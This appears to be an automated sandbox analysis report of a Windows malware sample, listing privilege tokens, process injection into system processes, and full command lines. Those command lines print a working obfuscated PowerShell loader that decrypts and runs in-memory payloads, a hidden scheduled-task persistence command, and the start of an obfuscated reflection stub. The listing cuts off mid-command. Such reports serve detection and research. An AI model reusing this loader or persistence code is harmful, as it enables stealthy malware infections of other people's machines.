Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 4152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 4152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 3212 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 1460 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 1460 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 1460 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 3212 wrote to memory of 732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 3212 wrote to memory of 732 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 732 wrote to memory of 4552 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 732 wrote to memory of 4552 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 732 wrote to memory of 4552 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4552 wrote to memory of 2376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4552 wrote to memory of 2376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4552 wrote to memory of 2376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4552 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4552 wrote to memory of 2316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2316 wrote to memory of 2052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 2316 wrote to memory of 2052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 2316 wrote to memory of 2052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 4916 wrote to memory of 3000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4916 wrote to memory of 3000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4916 wrote to memory of 3000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4916 wrote to memory of 3000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4916 wrote to memory of 3000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4916 wrote to memory of 3000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4916 wrote to memory of 3000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4916 wrote to memory of 3000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3000 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3000 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3000 wrote to memory of 952 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 64 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3000 wrote to memory of 512 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1044 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 1060 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 1064 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1192 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1200 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 1280 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1308 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1440 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1448 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1480 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1496 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 1648 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 1704 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 1736 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 1816 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 1824 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 1944 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 2008 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 2024 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 1988 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 2068 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 2172 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 3000 wrote to memory of 2276 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 2292 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3000 wrote to memory of 2436 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 2440 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3000 wrote to memory of 2636 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sihost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_30_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_30.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_30.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_30.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_30.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ExuXadVNNRFQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DqjrLAMkhdBJwb,[Parameter(Position=1)][Type]$GlUXojsaVN)$XJVVFSweQNj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+'or'+'y'+'M'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+'eg'+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+',P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+','+''+[Char](65)+''+'n'+''+'s'+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$XJVVFSweQNj.DefineConstructor('R'+[Char](84)+'Spe'+'c'+''+'i'+'a'+[Char](108)+'N'+[Char](97)+'m'+'e'+''+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$DqjrLAMkhdBJwb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+'ge'+'d'+'');$XJVVFSweQNj.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+'S'+[Char](105)+'g'+[Char](44)+''+'N'+''+'e'+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+','+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+'a'+'l'+'',$GlUXojsaVN,$DqjrLAMkhdBJwb).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');Write-Output $XJVVFSweQNj.CreateType();}$iGMJTHfuynbNu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$ESFnyzonOYnuvF=$iGMJTHfuynbNu.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+'dre'+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GOZdQgihxhNqCYyoaiL=ExuXadVNNRFQ 